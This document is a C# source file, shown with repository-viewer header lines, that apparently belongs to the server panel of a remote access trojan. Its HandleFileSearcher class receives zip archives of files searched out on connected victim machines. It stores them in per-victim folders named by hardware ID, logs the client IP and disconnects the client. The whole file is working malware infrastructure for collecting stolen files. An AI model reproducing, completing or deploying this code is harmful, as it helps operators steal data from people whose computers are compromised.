36 lines
1.1 KiB
C#
36 lines
1.1 KiB
C#
using System;
|
||
using System.Drawing;
|
||
using System.IO;
|
||
using System.Threading.Tasks;
|
||
using System.Windows.Forms;
|
||
using MessagePackLib.MessagePack;
|
||
using Server.Connection;
|
||
|
||
namespace Server.Handle_Packet;
|
||
|
||
public class HandleFileSearcher
|
||
{
|
||
public async void SaveZipFile(Clients client, MsgPack unpack_msgpack)
|
||
{
|
||
try
|
||
{
|
||
string fullPath = Path.Combine(Application.StartupPath, "ClientsFolder", unpack_msgpack.ForcePathObject("Hwid").AsString, "FileSearcher");
|
||
if (!Directory.Exists(fullPath))
|
||
{
|
||
Directory.CreateDirectory(fullPath);
|
||
}
|
||
await Task.Run(delegate
|
||
{
|
||
byte[] asBytes = unpack_msgpack.ForcePathObject("ZipFile").GetAsBytes();
|
||
File.WriteAllBytes(fullPath + "//" + DateTime.Now.ToString("MM-dd-yyyy HH;mm;ss") + ".zip", asBytes);
|
||
});
|
||
new HandleLogs().Addmsg("Client " + client.Ip + " File Search success,file located @ ClientsFolder/" + unpack_msgpack.ForcePathObject("Hwid").AsString + "/FileSearcher", Color.Purple);
|
||
client.Disconnected();
|
||
}
|
||
catch (Exception ex)
|
||
{
|
||
new HandleLogs().Addmsg("File Search error " + ex.Message, Color.Red);
|
||
}
|
||
}
|
||
}
|